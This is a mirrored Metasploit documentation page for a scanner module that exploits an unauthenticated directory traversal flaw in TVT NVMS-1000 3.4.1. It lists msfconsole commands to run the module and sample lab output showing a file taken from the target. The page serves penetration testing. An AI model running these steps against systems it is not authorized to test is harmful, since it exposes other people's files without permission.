dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md

976 B
Raw Permalink Blame History

Description

This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.

Vulnerable Application

Verification

  1. ./msfconsole
  2. use auxiliary/scanner/http/tvt_nvms_traversal
  3. set rhosts <rhost>
  4. run

Scenarios

Tested against Windows 7 SP1

msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
RHOSTS => 192.168.43.152
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run

[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tvt_nvms_traversal) >

References